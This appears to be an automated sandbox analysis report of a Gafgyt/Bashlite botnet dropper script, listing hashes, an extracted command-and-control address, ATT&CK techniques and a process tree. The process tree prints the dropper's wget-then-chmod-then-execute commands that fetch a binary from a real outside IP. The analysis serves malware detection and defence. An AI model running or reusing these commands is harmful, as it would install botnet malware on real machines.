gafgyt | d21adb4e0938c18241d225748676e9f73c5a81210be881841b3b22c6e6abe9b4

Analysis

max time kernel
29s
max time network
28s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
01/03/2025, 11:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

load.sh
Size

129B
MD5

b165b7f155810af7139dd707d2e151c9
SHA1

a49fe736dd310d0a64f3628c744c590fd7c43bdc
SHA256

d21adb4e0938c18241d225748676e9f73c5a81210be881841b3b22c6e6abe9b4
SHA512

8256ac2815b643527aae2410fa26a4179c22b793d028b402b2077fd57031e48f2457f6a07a6a0f53e479a3781ac466f248e58114dd38e35793ac3364e07a177c

Score

10^/10

gafgyt botnet defense_evasion

Malware Config

Extracted

Family

gafgyt

23.157.176.170:4258

Signatures

Detected Gafgyt variant 1 IoCs

resource	yara_rule
behavioral1/files/fstream-1.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1512	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/bin.x86_64	1513	load.sh

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/bin.x86_64	wget

/tmp/load.sh
/tmp/load.sh
1⤵
- Executes dropped EXE
PID:1506
- /usr/bin/wget
  wget -q http://23.157.176.170/bin.x86_64 -O /tmp/bin.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1507
- /bin/chmod
  chmod +x /tmp/bin.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1512

/tmp/bin.x86_64
/tmp/bin.x86_64
1⤵
PID:1513

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/bin.x86_64

Filesize
1.2MB

MD5
4a3c1c3b93e23346db61e05d48b6851b

SHA1
1aa8f6002d26188006fb6e2f844464d9cfcf225a

SHA256
d42209da7d4a2af37c7bb2e0bdeab6b30d7b1bfe4a0ef8e47cfba8140eb1ba34

SHA512
ae669cd0418ab4cdf00ac07ea3fd03b2ef9b6d37a3a201004bbdab0fdb33082024097e81e1cd245a6f3290b2b67c127e1316e59a24f6918211fd15c5d2c54add

Download Submit